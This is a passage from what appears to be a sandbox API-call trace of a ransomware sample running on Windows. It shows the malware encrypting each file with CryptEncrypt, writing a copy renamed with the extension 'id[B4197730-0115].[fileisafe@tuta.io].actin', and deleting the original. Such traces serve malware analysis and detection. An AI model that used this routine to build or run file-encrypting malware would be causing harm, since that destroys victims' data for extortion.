dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.348] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=80738) returned 1 [0047.348] CloseHandle (hObject=0x324) returned 1 [0047.348] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 0x80 [0047.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.357] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.357] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.357] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.357] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.358] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c80) returned 1 [0047.358] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.358] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x13b62, lpOverlapped=0x0) returned 1 [0047.360] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13b70, dwBufLen=0x13b70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13b70) returned 1 [0047.360] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x13b70, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x13b70, lpOverlapped=0x0) returned 1 [0047.362] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0047.362] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.362] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.362] CryptDestroyKey (hKey=0xf71b80) returned 1 [0047.362] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.362] CryptDestroyKey (hKey=0xf71c80) returned 1 [0047.362] CloseHandle (hObject=0x324) returned 1 [0047.362] CloseHandle (hObject=0x2e4) returned 1 [0047.364] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 1 [0047.365] SetEvent (hEvent=0x2e8) returned 1 [0047.365] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.365] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.365] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3865) returned 1 [0047.365] CloseHandle (hObject=0x2e4) returned 1 [0047.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 0x80 [0047.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.366] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.366] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.366] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.366] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.367] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71a40) returned 1 [0047.367] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.367] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xf19, lpOverlapped=0x0) returned 1 [0047.369] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf20, dwBufLen=0xf20 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf20) returned 1 [0047.369] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf20, lpOverlapped=0x0) returned 1 [0047.370] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0047.370] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.370] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0047.370] CryptDestroyKey (hKey=0xf71e40) returned 1 [0047.370] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0047.370] CryptDestroyKey (hKey=0xf71a40) returned 1 [0047.370] CloseHandle (hObject=0x2e4) returned 1 [0047.370] CloseHandle (hObject=0x324) returned 1 [0047.371] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 1 [0047.372] SetEvent (hEvent=0x2e8) returned 1 [0047.372] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.372] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.372] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77680) returned 1 [0047.372] CloseHandle (hObject=0x324) returned 1 [0047.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 0x80 [0047.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.372] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.372] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.372] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.372] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.373] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0047.373] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.373] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x12f70, lpOverlapped=0x0) returned 1 [0047.374] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12f80, dwBufLen=0x12f80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12f80) returned 1 [0047.374] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x12f80, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x12f80, lpOverlapped=0x0) returned 1 [0047.376] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71f40) returned 1 [0047.376] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.376] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.376] CryptDestroyKey (hKey=0xf71f40) returned 1 [0047.376] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.376] CryptDestroyKey (hKey=0xf72140) returned 1 [0047.376] CloseHandle (hObject=0x324) returned 1 [0047.377] CloseHandle (hObject=0x2e4) returned 1 [0047.378] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 1 [0047.380] SetEvent (hEvent=0x2e8) returned 1 [0047.380] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.380] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.380] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=17752) returned 1 [0047.380] CloseHandle (hObject=0x2e4) returned 1 [0047.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 0x80 [0047.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.380] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.380] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.380] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.380] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.381] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e00) returned 1 [0047.381] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.381] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4558, lpOverlapped=0x0) returned 1 [0047.382] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4560, dwBufLen=0x4560 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4560) returned 1 [0047.382] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4560, lpOverlapped=0x0) returned 1 [0047.383] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d80) returned 1 [0047.383] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.383] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.383] CryptDestroyKey (hKey=0xf71d80) returned 1 [0047.383] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.384] CryptDestroyKey (hKey=0xf71e00) returned 1 [0047.384] CloseHandle (hObject=0x2e4) returned 1 [0047.384] CloseHandle (hObject=0x324) returned 1 [0047.385] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 1 [0047.386] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.386] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.386] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3859) returned 1 [0047.386] CloseHandle (hObject=0x324) returned 1 [0047.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 0x80 [0047.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.386] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.386] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.386] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.386] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.388] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0047.388] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.388] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xf13, lpOverlapped=0x0) returned 1 [0047.389] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf20, dwBufLen=0xf20 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf20) returned 1 [0047.389] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf20, lpOverlapped=0x0) returned 1 [0047.390] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72180) returned 1 [0047.390] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.390] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0047.390] CryptDestroyKey (hKey=0xf72180) returned 1 [0047.390] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0047.390] CryptDestroyKey (hKey=0xf72140) returned 1 [0047.390] CloseHandle (hObject=0x324) returned 1 [0047.390] CloseHandle (hObject=0x2e4) returned 1 [0047.391] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 1 [0047.392] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.392] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.392] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76818) returned 1 [0047.392] CloseHandle (hObject=0x2e4) returned 1 [0047.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 0x80 [0047.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.392] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.392] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.392] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.393] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.393] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e00) returned 1 [0047.393] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.393] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x12c12, lpOverlapped=0x0) returned 1 [0047.570] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12c20, dwBufLen=0x12c20 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12c20) returned 1 [0047.570] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x12c20, lpOverlapped=0x0) returned 1 [0047.572] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0047.572] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.572] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.572] CryptDestroyKey (hKey=0xf71b00) returned 1 [0047.572] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.572] CryptDestroyKey (hKey=0xf71e00) returned 1 [0047.572] CloseHandle (hObject=0x2e4) returned 1 [0047.572] CloseHandle (hObject=0x324) returned 1 [0047.574] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 1 [0047.576] SetEvent (hEvent=0x2e8) returned 1 [0047.576] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.576] CreateFileW 